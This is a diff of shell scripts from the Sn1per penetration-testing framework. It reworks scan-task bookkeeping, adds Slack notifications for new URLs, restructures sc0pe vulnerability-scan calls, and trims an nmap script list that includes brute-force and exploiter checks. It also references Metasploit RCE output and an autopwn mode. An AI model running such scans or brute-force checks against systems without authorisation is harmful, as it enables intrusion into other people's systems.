sort -u $LOOT_DIR/vulnerabilities/sc0pe-*.txt > $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null
|
||||
egrep "CRITICAL" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/critical_vulns_total.txt
|
||||
egrep "HIGH" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/high_vulns_total.txt
|
||||
egrep "MEDIUM" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/medium_vulns_total.txt
|
||||
egrep "LOW" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/low_vulns_total.txt
|
||||
egrep "INFO" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/info_vulns_total.txt
|
||||
|
|
@ -29,10 +29,7 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
fi
|
||||
args="$args --noreport -m stealth"
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running-$TARGET-stealth.txt
|
||||
ls -lh $LOOT_DIR/scans/running-*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
|
|
@ -81,6 +78,8 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
echo -e "$OKORANGE + -- --=[ Launching stealth scan: $TARGET $RESET"
|
||||
echo -e "$OKGREEN $RESET"
|
||||
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_stealth.txt
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
if [[ "$WHOIS" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING WHOIS INFO $RESET"
|
||||
|
|
@ -278,6 +277,8 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
diff $LOOT_DIR/web/spider-$TARGET.bak $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2}' 2> /dev/null > $LOOT_DIR/web/spider-new-$TARGET.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS_SPIDER_NEW" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/spider-new-$TARGET.txt"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Spider URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
cat $LOOT_DIR/web/spider-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
fi
|
||||
fi
|
||||
if [[ "$WEB_JAVASCRIPT_ANALYSIS" == "1" ]]; then
|
||||
|
|
@ -301,6 +302,8 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
diff $LOOT_DIR/web/dirsearch-$TARGET.bak $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2 " " $3 " " $4}' 2> /dev/null > $LOOT_DIR/web/dirsearch-new-$TARGET.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS_DIRSEARCH_NEW" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/dirsearch-new-$TARGET.txt"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Disovered URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
cat $LOOT_DIR/web/dirsearch-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
fi
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
|
|
@ -444,6 +447,8 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
diff $LOOT_DIR/web/spider-$TARGET.bak $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2}' 2> /dev/null > $LOOT_DIR/web/spider-new-$TARGET.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS_SPIDER_NEW" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/spider-new-$TARGET.txt"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Spider URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
cat $LOOT_DIR/web/spider-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
fi
|
||||
fi
|
||||
if [[ "$WEB_JAVASCRIPT_ANALYSIS" == "1" ]]; then
|
||||
|
|
@ -467,6 +472,8 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
diff $LOOT_DIR/web/dirsearch-$TARGET.bak $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2 " " $3 " " $4}' 2> /dev/null > $LOOT_DIR/web/dirsearch-new-$TARGET.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS_DIRSEARCH_NEW" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/dirsearch-new-$TARGET.txt"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Disovered URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
cat $LOOT_DIR/web/dirsearch-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
fi
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
|
|
@ -522,10 +529,16 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
SSL="false"
|
||||
PORT="80"
|
||||
source $INSTALL_DIR/modes/sc0pe-passive-scan.sh
|
||||
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
|
||||
SSL="true"
|
||||
PORT="443"
|
||||
source $INSTALL_DIR/modes/sc0pe-passive-scan.sh
|
||||
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
|
||||
|
||||
for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do
|
||||
source $file
|
||||
done
|
||||
|
||||
source $INSTALL_DIR/modes/sc0pe-network-scan.sh
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
fi
|
||||
|
||||
|
|
@ -554,8 +567,8 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
echo -e ""
|
||||
echo -e ""
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
mv $LOOT_DIR/scans/running-$TARGET-stealth.txt $LOOT_DIR/scans/finished-$TARGET-stealth.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running-*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
rm -f $LOOT_DIR/scans/running_${TARGET}_stealth.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
|
||||
sort -u $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null > $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null
|
||||
|
||||
|
|
|
|||
|
|
@ -15,7 +15,7 @@ if [[ "$MODE" = "vulnscan" ]]; then
|
|||
mkdir $LOOT_DIR/scans 2> /dev/null
|
||||
mkdir $LOOT_DIR/output 2> /dev/null
|
||||
fi
|
||||
args="$args --noreport -m vulnscan"
|
||||
args="$args --noreport -m vulnscan"
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-vulnscan.txt
|
||||
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
|
|
@ -25,7 +25,7 @@ if [[ "$MODE" = "vulnscan" ]]; then
|
|||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
fi
|
||||
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
|
|
@ -91,7 +91,28 @@ if [[ "$MODE" = "vulnscan" ]]; then
|
|||
omp -h $OPENVAS_HOST -p $OPENVAS_PORT -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD -G | grep $TARGET
|
||||
fi
|
||||
fi
|
||||
source $INSTALL_DIR/modes/sc0pe.sh
|
||||
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING SC0PE WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
SSL="false"
|
||||
PORT="80"
|
||||
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
|
||||
source $INSTALL_DIR/modes/sc0pe-active-webscan.sh
|
||||
SSL="true"
|
||||
PORT="443"
|
||||
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
|
||||
source $INSTALL_DIR/modes/sc0pe-active-webscan.sh
|
||||
|
||||
for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do
|
||||
source $file
|
||||
done
|
||||
|
||||
source $INSTALL_DIR/modes/sc0pe-network-scan.sh
|
||||
fi
|
||||
|
||||
source $INSTALL_DIR/modes/sc0pe.sh
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
|
|||
|
|
@ -233,13 +233,4 @@
|
|||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_rv32x_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_rv32x_rce.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_rv32x_rce.raw 2> /dev/null
|
||||
fi
|
||||
|
||||
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING SC0PE WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
source $INSTALL_DIR/modes/sc0pe-passive-scan.sh
|
||||
source $INSTALL_DIR/modes/sc0pe-active-scan.sh
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
fi
|
||||
|
||||
|
|
@ -16,8 +16,8 @@ if [[ "$MODE" = "webporthttp" ]]; then
|
|||
fi
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE -p $PORT --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running-$TARGET-webporthttp.txt
|
||||
ls -lh $LOOT_DIR/scans/running-*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: http://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: http://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
|
|
@ -157,7 +157,7 @@ if [[ "$MODE" = "webporthttp" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING NMAP SCRIPTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
nmap -Pn -p $PORT -sV -v --script-timeout 90 --script=http-adobe-coldfusion-apsa1301,http-apache-server-status,http-aspnet-debug,http-auth-finder,http-auth,http-avaya-ipoffice-users,http-awstatstotals-exec,http-axis2-dir-traversal,http-backup-finder,http-barracuda-dir-traversal,http-brute,http-cakephp-version,http-chrono,http-config-backup,http-cookie-flags,http-cors,http-cross-domain-policy,http-csrf,http-date,http-default-accounts,http-devframework,http-dlink-backdoor,http-dombased-xss,http-domino-enum-passwords,http-drupal-enum-users,http-drupal-enum,http-errors,http-feed,http-fetch,http-fileupload-exploiter,http-form-brute,http-form-fuzzer,http-frontpage-login,http-generator,http-git,http-gitweb-projects-enum,http-google-malware,http-grep,http-headers,http-huawei-hg5xx-vuln,http-icloud-findmyiphone,http-icloud-sendmsg,http-iis-short-name-brute,http-iis-webdav-vuln,http-internal-ip-disclosure,http-joomla-brute,http-ls,http-majordomo2-dir-traversal,http-method-tamper,http-methods,http-mobileversion-checker,http-ntlm-info,http-open-proxy,http-open-redirect,http-passwd,http-php-version,http-phpmyadmin-dir-traversal,http-phpself-xss,http-proxy-brute,http-put,http-qnap-nas-info,http-rfi-spider,http-robots.txt,http-robtex-reverse-ip,http-robtex-shared-ns,http-security-headers,http-server-header,http-shellshock,http-sitemap-generator,http-sql-injection,http-stored-xss,http-svn-enum,http-svn-info,http-title,http-tplink-dir-traversal,http-trace,http-traceroute,http-unsafe-output-escaping,http-userdir-enum,http-vhosts,http-virustotal,http-vlcstreamer-ls,http-vmware-path-vuln,http-vuln-cve2006-3392,http-vuln-cve2009-3960,http-vuln-cve2010-0738,http-vuln-cve2010-2861,http-vuln-cve2011-3192,http-vuln-cve2011-3368,http-vuln-cve2012-1823,http-vuln-cve2013-0156,http-vuln-cve2013-6786,http-vuln-cve2013-7091,http-vuln-cve2014-2126,http-vuln-cve2014-2127,http-vuln-cve2014-2128,http-vuln-cve2014-2129,http-vuln-cve2014-3704,http-vuln-cve2014-8877,http-vuln-cve2015-1427,http-vuln-cve2015-1635,http-vuln-cve2017-1001000,http-vuln-cve2017-5638,http-vuln-cve2017-5689,http-vuln-cve2017-8917,http-vuln-misfortune-cookie,http-vuln-wnr1000-creds,http-waf-detect,http-waf-fingerprint,http-webdav-scan,http-wordpress-brute,http-wordpress-enum,http-wordpress-users,http-xssed,/usr/share/nmap/scripts/vulners,http-default-accounts --script-args http-default-accounts.fingerprintfile=/usr/share/sniper/bin/http-default-accounts-fingerprints-nndefaccts.lua $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port$PORT
|
||||
nmap -Pn -p $PORT -sV -v --script-timeout 90 --script=http-auth-finder,http-auth,http-brute,/usr/share/nmap/scripts/vulners,http-default-accounts $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port$PORT
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/output/nmap-$TARGET-port$PORT 2> /dev/null > $LOOT_DIR/output/nmap-$TARGET-port$PORT.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/nmap-$TARGET-port$PORT 2> /dev/null
|
||||
fi
|
||||
|
|
@ -315,8 +315,22 @@ if [[ "$MODE" = "webporthttp" ]]; then
|
|||
|
||||
SSL="false"
|
||||
source $INSTALL_DIR/modes/web_autopwn.sh
|
||||
source $INSTALL_DIR/modes/osint_stage_2.sh
|
||||
|
||||
source $INSTALL_DIR/modes/osint_stage_2.sh
|
||||
fi
|
||||
|
||||
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING SC0PE WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
SSL="false"
|
||||
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
|
||||
source $INSTALL_DIR/modes/sc0pe-active-webscan.sh
|
||||
|
||||
for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do
|
||||
source $file
|
||||
done
|
||||
|
||||
source $INSTALL_DIR/modes/sc0pe-network-scan.sh
|
||||
fi
|
||||
|
||||
source $INSTALL_DIR/modes/sc0pe.sh
|
||||
|
|
@ -328,8 +342,8 @@ if [[ "$MODE" = "webporthttp" ]]; then
|
|||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
mv $LOOT_DIR/scans/running-$TARGET-$MODE.txt $LOOT_DIR/scans/finished-$TARGET-$MODE.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running-*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
rm -f $LOOT_DIR/scans/running_$TARGET_$MODE.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
|
||||
VULNERABLE_METASPLOIT=$(egrep -h -i -s "may be vulnerable|is vulnerable|IKE response with leak|File saved in" $LOOT_DIR/output/msf-$TARGET-*.txt 2> /dev/null)
|
||||
if [[ ${#VULNERABLE_METASPLOIT} -ge 5 ]]; then
|
||||
|
|
|
|||
|
|
@ -16,8 +16,8 @@ if [[ "$MODE" = "webporthttps" ]]; then
|
|||
fi
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE -p $PORT --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running-$TARGET-$MODE.txt
|
||||
ls -lh $LOOT_DIR/scans/running-*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: https://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: https://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
|
|
@ -173,7 +173,7 @@ if [[ "$MODE" = "webporthttps" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING NMAP SCRIPTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
nmap -Pn -p $PORT -sV -v --script-timeout 90 --script=http-adobe-coldfusion-apsa1301,http-apache-server-status,http-aspnet-debug,http-auth-finder,http-auth,http-avaya-ipoffice-users,http-awstatstotals-exec,http-axis2-dir-traversal,http-backup-finder,http-barracuda-dir-traversal,http-brute,http-cakephp-version,http-chrono,http-config-backup,http-cookie-flags,http-cors,http-cross-domain-policy,http-csrf,http-date,http-default-accounts,http-devframework,http-dlink-backdoor,http-dombased-xss,http-domino-enum-passwords,http-drupal-enum-users,http-drupal-enum,http-errors,http-feed,http-fetch,http-fileupload-exploiter,http-form-brute,http-form-fuzzer,http-frontpage-login,http-generator,http-git,http-gitweb-projects-enum,http-google-malware,http-grep,http-headers,http-huawei-hg5xx-vuln,http-icloud-findmyiphone,http-icloud-sendmsg,http-iis-short-name-brute,http-iis-webdav-vuln,http-internal-ip-disclosure,http-joomla-brute,http-ls,http-majordomo2-dir-traversal,http-method-tamper,http-methods,http-mobileversion-checker,http-ntlm-info,http-open-proxy,http-open-redirect,http-passwd,http-php-version,http-phpmyadmin-dir-traversal,http-phpself-xss,http-proxy-brute,http-put,http-qnap-nas-info,http-rfi-spider,http-robots.txt,http-robtex-reverse-ip,http-robtex-shared-ns,http-security-headers,http-server-header,http-shellshock,http-sitemap-generator,http-sql-injection,http-stored-xss,http-svn-enum,http-svn-info,http-title,http-tplink-dir-traversal,http-trace,http-traceroute,http-unsafe-output-escaping,http-userdir-enum,http-vhosts,http-virustotal,http-vlcstreamer-ls,http-vmware-path-vuln,http-vuln-cve2006-3392,http-vuln-cve2009-3960,http-vuln-cve2010-0738,http-vuln-cve2010-2861,http-vuln-cve2011-3192,http-vuln-cve2011-3368,http-vuln-cve2012-1823,http-vuln-cve2013-0156,http-vuln-cve2013-6786,http-vuln-cve2013-7091,http-vuln-cve2014-2126,http-vuln-cve2014-2127,http-vuln-cve2014-2128,http-vuln-cve2014-2129,http-vuln-cve2014-3704,http-vuln-cve2014-8877,http-vuln-cve2015-1427,http-vuln-cve2015-1635,http-vuln-cve2017-1001000,http-vuln-cve2017-5638,http-vuln-cve2017-5689,http-vuln-cve2017-8917,http-vuln-misfortune-cookie,http-vuln-wnr1000-creds,http-waf-detect,http-waf-fingerprint,http-webdav-scan,http-wordpress-brute,http-wordpress-enum,http-wordpress-users,http-xssed,/usr/share/nmap/scripts/vulners,http-default-accounts --script-args http-default-accounts.fingerprintfile=/usr/share/sniper/bin/http-default-accounts-fingerprints-nndefaccts.lua $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port$PORT
|
||||
nmap -Pn -p $PORT -sV -v --script-timeout 90 --script=http-auth-finder,http-auth,http-brute,/usr/share/nmap/scripts/vulners,http-default-accounts $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port$PORT
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/output/nmap-$TARGET-port$PORT 2> /dev/null > $LOOT_DIR/output/nmap-$TARGET-port$PORT.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/nmap-$TARGET-port$PORT 2> /dev/null
|
||||
fi
|
||||
|
|
@ -325,10 +325,23 @@ if [[ "$MODE" = "webporthttps" ]]; then
|
|||
SSL="true"
|
||||
source $INSTALL_DIR/modes/web_autopwn.sh
|
||||
source $INSTALL_DIR/modes/osint_stage_2.sh
|
||||
|
||||
fi
|
||||
|
||||
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING SC0PE WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
SSL="true"
|
||||
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
|
||||
source $INSTALL_DIR/modes/sc0pe-active-webscan.sh
|
||||
for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do
|
||||
source $file
|
||||
done
|
||||
source $INSTALL_DIR/modes/sc0pe-network-scan.sh
|
||||
fi
|
||||
|
||||
source $INSTALL_DIR/modes/sc0pe.sh
|
||||
|
||||
cd $INSTALL_DIR
|
||||
FULLNMAPSCAN="1"
|
||||
source $INSTALL_DIR/modes/fullportscan.sh
|
||||
|
|
@ -337,8 +350,8 @@ if [[ "$MODE" = "webporthttps" ]]; then
|
|||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
mv $LOOT_DIR/scans/running-$TARGET-$MODE.txt $LOOT_DIR/scans/finished-$TARGET-$MODE.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running-*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
|
||||
VULNERABLE_METASPLOIT=$(egrep -h -i -s "may be vulnerable|is vulnerable|IKE response with leak|File saved in" $LOOT_DIR/output/msf-$TARGET-*.txt 2> /dev/null)
|
||||
if [[ ${#VULNERABLE_METASPLOIT} -ge 5 ]]; then
|
||||
|
|
|
|||
|
|
@ -46,25 +46,13 @@ if [[ "$MODE" = "webscan" ]]; then
|
|||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
|
||||
touch $LOOT_DIR/scans/$TARGET-webscan.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running-$TARGET-webscan.txt 2> /dev/null
|
||||
